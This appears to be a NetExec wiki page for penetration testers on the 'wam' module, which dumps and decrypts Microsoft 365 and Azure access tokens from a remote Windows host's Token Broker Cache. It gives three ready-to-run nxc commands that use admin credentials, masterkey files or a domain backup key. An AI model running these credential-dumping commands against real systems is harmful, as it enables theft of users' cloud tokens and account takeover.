🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ”§ NetExec Wiki / Dump Token Broker Cache

πŸ†• Dump Token Broker Cache

{% hint style="warning" %}
You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
{% endhint %}

Microsoft 365 and Azure applications on desktop will store access tokens to the Token Broker Cache. These are stored with user DPAPI. You can use the wam module in order to decrypt them. More info here https://blog.xpnsec.com/wam-bam/

nxc smb <target> -u <username> -p <password> -M wam
nxc smb <target> -u <username> -p <password> -M wam --mkfile masterkeys.txt
nxc smb <target> -u <username> -p <password> -M wam --pvk domain_backup_key.pvk

{% embed url="https://blog.xpnsec.com/wam-bam/" %}